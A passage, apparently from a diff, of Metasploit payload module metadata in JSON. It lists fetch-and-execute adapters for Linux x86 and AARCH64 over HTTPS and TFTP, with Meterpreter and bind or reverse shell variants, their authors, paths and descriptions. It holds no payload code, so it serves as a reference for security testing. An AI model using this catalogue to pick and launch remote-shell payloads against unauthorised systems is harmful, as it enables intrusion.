"payload/cmd/linux/https/x86/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/https/x86/meterpreter_reverse_https": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/x86/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/meterpreter_reverse_https", - "staged": 
false - }, - "payload_cmd/linux/https/x86/meterpreter_reverse_tcp": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/x86/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/https/x86/metsvc_bind_tcp": { - "name": "HTTPS Fetch, Linux Meterpreter Service, Bind TCP", - "fullname": "payload/cmd/linux/https/x86/metsvc_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "hdm " - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nStub payload for interacting with a Meterpreter Service", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/metsvc_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - 
"payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/metsvc_bind_tcp", - "staged": false - }, - "payload_cmd/linux/https/x86/metsvc_reverse_tcp": { - "name": "HTTPS Fetch, Linux Meterpreter Service, Reverse TCP Inline", - "fullname": "payload/cmd/linux/https/x86/metsvc_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "hdm " - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nStub payload for interacting with a Meterpreter Service", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/metsvc_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/metsvc_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/https/x86/read_file": { - "name": "HTTPS Fetch, Linux Read File", - "fullname": "payload/cmd/linux/https/x86/read_file", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "hal" - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nRead up to 4096 bytes from the local file system and write it back out to the specified file descriptor", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - 
"ref_name": "cmd/linux/https/x86/read_file", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/read_file", - "staged": false - }, - "payload_cmd/linux/https/x86/shell/bind_ipv6_tcp": { - "name": "HTTPS Fetch, Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)", - "fullname": "payload/cmd/linux/https/x86/shell/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape ", - "kris katterjohn ", - "egypt " - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nSpawn a command shell (staged).\n\nListen for an IPv6 connection (Linux x86)", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/shell/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/shell/bind_ipv6_tcp", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/bind_ipv6_tcp" - }, - "payload_cmd/linux/https/x86/shell/bind_ipv6_tcp_uuid": { - "name": "HTTPS Fetch, Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)", - "fullname": "payload/cmd/linux/https/x86/shell/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape ", - "kris katterjohn ", - "egypt ", - "OJ Reeves" - ], - 
"description": "Fetch and execute an x86 payload from an HTTPS server.\nSpawn a command shell (staged).\n\nListen for an IPv6 connection with UUID Support (Linux x86)", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/shell/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/shell/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/bind_ipv6_tcp_uuid" - }, - "payload_cmd/linux/https/x86/shell/bind_nonx_tcp": { - "name": "HTTPS Fetch, Linux Command Shell, Bind TCP Stager", - "fullname": "payload/cmd/linux/https/x86/shell/bind_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape " - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nSpawn a command shell (staged).\n\nListen for a connection", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/shell/bind_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/shell/bind_nonx_tcp", - "staged": true, - 
"stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/bind_nonx_tcp" - }, - "payload_cmd/linux/https/x86/shell/bind_tcp": { - "name": "HTTPS Fetch, Linux Command Shell, Bind TCP Stager (Linux x86)", - "fullname": "payload/cmd/linux/https/x86/shell/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape ", - "egypt " - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nSpawn a command shell (staged).\n\nListen for a connection (Linux x86)", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/shell/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/shell/bind_tcp", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/bind_tcp" - }, - "payload_cmd/linux/https/x86/shell/bind_tcp_uuid": { - "name": "HTTPS Fetch, Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)", - "fullname": "payload/cmd/linux/https/x86/shell/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape ", - "egypt ", - "OJ Reeves" - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nSpawn a command shell (staged).\n\nListen for a connection with UUID Support (Linux x86)", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - 
"mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/shell/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/shell/bind_tcp_uuid", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/bind_tcp_uuid" - }, - "payload_cmd/linux/https/x86/shell/find_tag": { - "name": "HTTPS Fetch, Linux Command Shell, Find Tag Stager", - "fullname": "payload/cmd/linux/https/x86/shell/find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape " - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nSpawn a command shell (staged).\n\nUse an established connection", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/shell/find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/shell/find_tag", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/find_tag" - }, - "payload_cmd/linux/https/x86/shell/reverse_ipv6_tcp": { - "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Stager (IPv6)", - "fullname": "payload/cmd/linux/https/x86/shell/reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - 
"author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape ", - "kris katterjohn " - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nSpawn a command shell (staged).\n\nConnect back to attacker over IPv6", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/shell/reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/shell/reverse_ipv6_tcp", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/reverse_ipv6_tcp" - }, - "payload_cmd/linux/https/x86/shell/reverse_nonx_tcp": { - "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Stager", - "fullname": "payload/cmd/linux/https/x86/shell/reverse_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape " - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/shell/reverse_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - 
"adapted_refname": "linux/x86/shell/reverse_nonx_tcp", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/reverse_nonx_tcp" - }, - "payload_cmd/linux/https/x86/shell/reverse_tcp": { - "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Stager", - "fullname": "payload/cmd/linux/https/x86/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape ", - "egypt ", - "tkmru" - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/shell/reverse_tcp", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/reverse_tcp" - }, - "payload_cmd/linux/https/x86/shell/reverse_tcp_uuid": { - "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Stager", - "fullname": "payload/cmd/linux/https/x86/shell/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape ", - "egypt ", - "OJ Reeves" - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - 
"autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/shell/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/shell/reverse_tcp_uuid", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/reverse_tcp_uuid" - }, - "payload_cmd/linux/https/x86/shell_bind_ipv6_tcp": { - "name": "HTTPS Fetch, Linux Command Shell, Bind TCP Inline (IPv6)", - "fullname": "payload/cmd/linux/https/x86/shell_bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "kris katterjohn " - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nListen for a connection over IPv6 and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/shell_bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/shell_bind_ipv6_tcp", - "staged": false - }, - "payload_cmd/linux/https/x86/shell_bind_tcp": { - "name": "HTTPS Fetch, Linux Command Shell, Bind TCP Inline", - "fullname": "payload/cmd/linux/https/x86/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - 
"Brendan Watters", - "Spencer McIntyre", - "Ramon de C Valle " - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nListen for a connection and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/shell_bind_tcp", - "staged": false - }, - "payload_cmd/linux/https/x86/shell_bind_tcp_random_port": { - "name": "HTTPS Fetch, Linux Command Shell, Bind TCP Random Port Inline", - "fullname": "payload/cmd/linux/https/x86/shell_bind_tcp_random_port", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Geyslan G. 
Bem ", - "Aleh Boitsau " - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\n\n Listen for a connection in a random port and spawn a command shell.\n Use nmap to discover the open port: 'nmap -sS target -p-'.", - "references": [ - "URL-https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port.asm", - "EDB-41631" - ], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/shell_bind_tcp_random_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/shell_bind_tcp_random_port", - "staged": false - }, - "payload_cmd/linux/https/x86/shell_find_port": { - "name": "HTTPS Fetch, Linux Command Shell, Find Port Inline", - "fullname": "payload/cmd/linux/https/x86/shell_find_port", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Ramon de C Valle " - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nSpawn a shell on an established connection", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/shell_find_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", 
- "adapted_refname": "linux/x86/shell_find_port", - "staged": false - }, - "payload_cmd/linux/https/x86/shell_find_tag": { - "name": "HTTPS Fetch, Linux Command Shell, Find Tag Inline", - "fullname": "payload/cmd/linux/https/x86/shell_find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape " - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nSpawn a shell on an established connection (proxy/NAT safe)", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/shell_find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/shell_find_tag", - "staged": false - }, - "payload_cmd/linux/https/x86/shell_reverse_tcp": { - "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/linux/https/x86/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Ramon de C Valle ", - "joev " - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nConnect back to attacker and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/shell_reverse_tcp", - "check": false, - 
"post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/https/x86/shell_reverse_tcp_ipv6": { - "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Inline (IPv6)", - "fullname": "payload/cmd/linux/https/x86/shell_reverse_tcp_ipv6", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Matteo Malvica " - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nConnect back to attacker and spawn a command shell over IPv6", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/shell_reverse_tcp_ipv6", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/shell_reverse_tcp_ipv6", - "staged": false - }, - "payload_cmd/linux/tftp/aarch64/meterpreter/reverse_tcp": { - "name": "TFTP Fetch, Reverse TCP Stager", - "fullname": "payload/cmd/linux/tftp/aarch64/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack " - ], - "description": "Fetch and execute an AARCH64 payload from a TFTP server.\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - 
"mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/aarch64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/aarch64/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/aarch64", - "adapted_refname": "linux/aarch64/meterpreter/reverse_tcp", - "staged": true, - "stage_refname": "linux/aarch64/meterpreter", - "stager_refname": "linux/aarch64/reverse_tcp" - }, - "payload_cmd/linux/tftp/aarch64/meterpreter_reverse_http": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/aarch64/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an AARCH64 payload from a TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/aarch64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/aarch64/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/aarch64", - "adapted_refname": "linux/aarch64/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/tftp/aarch64/meterpreter_reverse_https": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/aarch64/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - 
"timwr" - ], - "description": "Fetch and execute an AARCH64 payload from a TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/aarch64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/aarch64/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/aarch64", - "adapted_refname": "linux/aarch64/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/tftp/aarch64/meterpreter_reverse_tcp": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/aarch64/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an AARCH64 payload from a TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/aarch64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/aarch64/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/aarch64", - "adapted_refname": "linux/aarch64/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/aarch64/shell/reverse_tcp": { - "name": "TFTP Fetch, Linux dup2 Command Shell, Reverse TCP Stager", - "fullname": 
